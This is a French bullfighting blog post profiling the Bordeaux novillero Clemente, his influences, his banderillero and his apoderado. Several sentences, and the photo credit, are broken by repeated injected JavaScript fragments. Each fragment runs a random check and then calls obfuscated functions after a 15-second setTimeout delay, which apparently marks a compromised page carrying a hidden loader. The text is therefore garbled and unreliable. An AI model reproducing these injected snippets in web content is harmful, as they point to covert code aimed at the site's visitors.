CLEMENTE: IL FAUT LE SUIVRE

Chaque saison amène avec elle de nouveaux visages, de nouvelles espérances. On attend de la fraîcheur et surtout de l’originalité. Quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and cette dernière étincelle, la nouvelle se propage jusqu’aux derniers cercles d’aficionados. En France, le nom de Clemente commence à percer. Novillero originaire de Bordeaux, fils d’un collectionneur de livres et de vidéos taurines parmi lesquels le jeune Clément Dubecq a forgé son aficion, ils semblent l’avoir marqué et on ne remarque pas chez lui certains mimétismes propres aux écoles taurines. Le torero blond  interpelle déjà par sa présence, son côté souriant et à fois mélancolique, son regard adolescent quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and il n’est pas face au toro et celui d’un homme plus mûr et avec les premières rides inhérents au défi de toréer. Comme tout torero débutant il est irrégulier, comme s’il hésitait, devant les novillos, entre privilégier la lidia sous son aspect le plus technique et le « sentimiento » qu’il a en lui. Cette quête, ce doute, contribuent au charme de son toreo qui lorsqu’il éclot a une profondeur qui ne recherche pas la grâce superficielle, comme si elle venait tout naturellement, avec des réminiscences de toreo d’un autre temps. Personnellement il me rappelle parfois la matador de Lorca Pepín Jiménez. Depuis ses débuts c’est le vétéran bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderillero Fermín González qui est à ses côtés et il compte sur son nouvel apoderado, Carlos Zuñiga, pour qu’on puisse le voir souvent des deux côtés des Pyrénées.

galerie photo de Bertrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Caritey et Bruno Lasnier. Captieux 2013 et Samadet 2014.

[simpleviewer gallery_id="14"]

Les commentaires sont fermés.